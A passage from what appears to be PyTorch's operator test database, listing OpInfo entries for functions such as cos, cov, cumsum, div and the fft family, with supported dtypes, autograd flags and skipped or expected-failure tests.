"TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_inplace", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_out", dtypes=(torch.complex32,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.complex32,)), )), OpInfo('resolve_conj', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('resolve_neg', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('view_as_real', dtypes=complex_types(), supports_forward_ad=True, supports_out=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_real, test_conjugated_samples=False, ), OpInfo('view_as_complex', dtypes=floating_types_and(torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, test_neg_view=False, sample_inputs_func=sample_inputs_view_as_complex, skips=( # RuntimeError: Tensor must have a last dimension with stride 1 DecorateInfo(unittest.expectedFailure, "TestCommon", "test_noncontiguous_samples"), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.half,)), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.half,)), )), BinaryUfuncInfo('complex', dtypes=floating_types_and(torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # Test doesn't account for complex's type promotion semantics DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps'), )), BinaryUfuncInfo('copysign', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('corrcoef', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_corrcoef, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('cos', ref=np.cos, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), # This fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), UnaryUfuncInfo('cosh', ref=np_unary_ufunc_integer_promotion_wrapper(np.cosh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), OpInfo('cov', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_cov, error_inputs_func=error_inputs_cov, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Float did not match double DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), # Jacobian mismatch DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Barely fails"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # JIT test not working for tensor kwargs (https://github.com/pytorch/pytorch/issues/58507) # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.cov(i0, correction=0, fweights=None, aweights=tensor([0.0518, 0.4681], dtype=torch.float32, requires_grad=True)) # noqa: B950 # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('cross', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), sample_inputs_func=sample_inputs_cross, supports_fwgrad_bwgrad=True, supports_out=True, supports_forward_ad=True), OpInfo('linalg.cross', ref=lambda x, y, dim=-1: np.cross(x, y, axis=dim), op=torch.linalg.cross, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), aten_name='linalg_cross', sample_inputs_func=sample_inputs_cross, supports_out=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # cumsum does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), sample_inputs_func=sample_inputs_cumulative_ops), OpInfo('cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # cumprod does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), # gradgradcheck fails in fast_mode=True: #56275 sample_inputs_func=sample_inputs_cumprod, gradcheck_fast_mode=False), OpInfo('cummax', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('cummin', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), UnaryUfuncInfo('deg2rad', ref=np.radians, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), )), OpInfo('diff', op=torch.diff, # np.diff has np._NoValue as default values for prepend and append, compare_with_reference breaks if prepend/append # are set as None when converting to numpy ref=lambda input, n=1, dim=-1, prepend=np._NoValue, append=np._NoValue: ( np.diff(input, n, dim, np._NoValue if prepend is None else prepend, np._NoValue if append is None else append) ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diff), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='no_rounding_mode', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True),), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='trunc_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="trunc")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='floor_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="floor")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('true_divide', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, rhs_make_tensor_kwargs=dict(exclude_zero=True)), UnaryUfuncInfo('exp', ref=np_unary_ufunc_integer_promotion_wrapper(np.exp), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Reference: https://github.com/pytorch/pytorch/pull/50093#pullrequestreview-561791547 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), # Reference: https://github.com/pytorch/pytorch/issues/48010 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('expand', op=lambda self, shape: self.expand(shape), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_expand, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('expand_as', op=lambda self, other: self.expand_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_expand_as, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),), ), OpInfo('diag', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diag, error_inputs_func=error_inputs_diag), OpInfo('diag_embed', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal', # They are not strictly aliases as they have diverging defaults, but we can see them as aliases for testing purposes # If we add tests that test the function against the alias, make linalg.diagonal into its own OpInfo aliases=('linalg.diagonal',), aten_backward_name='diagonal_backward', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal_scatter', dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_scatter), BinaryUfuncInfo('eq', ref=np.equal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), always_returns_bool=True, supports_autograd=False, sample_inputs_func=sample_inputs_comparison_ops), BinaryUfuncInfo('fmax', op=torch.fmax, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmin', op=torch.fmin, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmod', ref=np.fmod, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), BinaryUfuncInfo('remainder', ref=np.remainder, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, operator_variant=operator.mod, inplace_operator_variant=operator.imod, supports_one_python_scalar=True, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), # Fails on XLA # False is not true : Tensors failed to compare as equal! # Attempted to compare equality of tensors with different dtypes DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), )), UnaryUfuncInfo('frac', ref=lambda x: np.modf(x)[0], dtypes=floating_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.bfloat16, torch.float16, torch.float32, torch.float64)), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.float32, torch.float64)), )), SpectralFuncInfo('fft.fft', aten_name='fft_fft', ref=np.fft.fft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), SpectralFuncInfo('fft.fft2', aten_name='fft_fft2', ref=np.fft.fft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.fftn', aten_name='fft_fftn', ref=np.fft.fftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.hfft', aten_name='fft_hfft', ref=np.fft.hfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False), SpectralFuncInfo('fft.hfft2', aten_name='fft_hfft2', ref=scipy.fft.hfft2 if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.hfftn', aten_name='fft_hfftn', ref=scipy.fft.hfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd'), ], ), SpectralFuncInfo('fft.rfft', aten_name='fft_rfft', ref=np.fft.rfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, skips=( ), check_batched_gradgrad=False), SpectralFuncInfo('fft.rfft2', aten_name='fft_rfft2', ref=np.fft.rfft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.rfftn', aten_name='fft_rfftn', ref=np.fft.rfftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.ifft', aten_name='fft_ifft', ref=np.fft.ifft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),), SpectralFuncInfo('fft.ifft2', aten_name='fft_ifft2', ref=np.fft.ifft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ifftn', aten_name='fft_ifftn', ref=np.fft.ifftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ihfft', aten_name='fft_ihfft', ref=np.fft.ihfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), skips=( ), check_batched_grad=False), SpectralFuncInfo('fft.ihfft2', aten_name='fft_ihfft2', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=( # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd'), # Mismatched elements! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warnings'))), SpectralFuncInfo('fft.ihfftn', aten_name='fft_ihfftn', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archss dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=[ # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Mismatched elements! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo( precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfft', aten_name='fft_irfft', ref=np.fft.irfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False), SpectralFuncInfo('fft.irfft2', aten_name='fft_irfft2', ref=np.fft.irfft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfftn', aten_name='fft_irfftn', ref=np.fft.irfftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), OpInfo('fft.fftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('fft.ifftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stft', decorators=[ skipCPUIfNoFFT, DecorateInfo(unittest.skip("Skipped! stft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ], dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_stft, supports_forward_ad=True, 